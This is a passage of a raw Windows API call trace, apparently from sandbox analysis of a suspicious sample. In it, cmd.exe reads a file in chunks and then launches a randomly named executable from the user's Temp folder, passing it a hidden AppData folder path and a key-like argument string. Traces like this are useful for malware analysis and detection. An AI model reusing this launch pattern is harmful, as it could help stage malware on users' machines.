lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.216] _close (_FileHandle=4) returned 0 [0174.216] FindNextFileW (in: hFindFile=0x320f58, lpFindFileData=0x18f560 | out: lpFindFileData=0x18f560) returned 0 [0174.217] GetLastError () returned 0x12 [0174.217] FindClose (in: hFindFile=0x320f58 | out: hFindFile=0x320f58) returned 1 [0174.217] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0174.219] _close (_FileHandle=3) returned 0 [0174.219] GetConsoleTitleW (in: lpConsoleTitle=0x18f9fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.219] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe\"")) returned 0xffffffff [0174.219] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.219] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.219] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.219] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.219] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.219] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.220] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.220] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.220] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.220] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.220] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.221] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.221] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.221] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.221] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.221] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.221] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.221] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.221] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.221] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.221] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.221] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.221] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.221] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.221] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.221] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0174.221] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0174.221] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0174.221] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0174.221] SetErrorMode (uMode=0x0) returned 0x0 [0174.221] SetErrorMode (uMode=0x1) returned 0x0 [0174.221] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3304a0, lpFilePart=0x18f51c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x18f51c*="Temp") returned 0x23 [0174.222] SetErrorMode (uMode=0x0) returned 0x1 [0174.222] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0174.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.225] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x1, lpFindFileData=0x18f2b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b8) returned 0x320f58 [0174.225] FindClose (in: hFindFile=0x320f58 | out: hFindFile=0x320f58) returned 1 [0174.225] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0174.225] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0174.225] GetConsoleTitleW (in: lpConsoleTitle=0x18f790, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.225] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f618, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f6e0 | out: lpAttributeList=0x18f618, lpSize=0x18f6e0) returned 1 [0174.225] UpdateProcThreadAttribute (in: lpAttributeList=0x18f618, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f6d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f618, lpPreviousValue=0x0) returned 1 [0174.225] GetStartupInfoW (in: lpStartupInfo=0x18f5d4 | out: lpStartupInfo=0x18f5d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.226] lstrcmpW (lpString1="\\WsPgAGWN.exe", lpString2="\\XCOPY.EXE") returned -1 [0174.227] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f674*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f6c0 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x18f6c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda0, dwThreadId=0x618)) returned 1 [0174.360] CloseHandle (hObject=0x4c) returned 1 [0174.360] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0174.360] GetEnvironmentStringsW () returned 0x332ce0* [0174.360] FreeEnvironmentStringsW (penv=0x332ce0) returned 1 [0174.360] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0175.007] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f5b4 | out: lpExitCode=0x18f5b4*=0x0) returned 1 [0175.007] 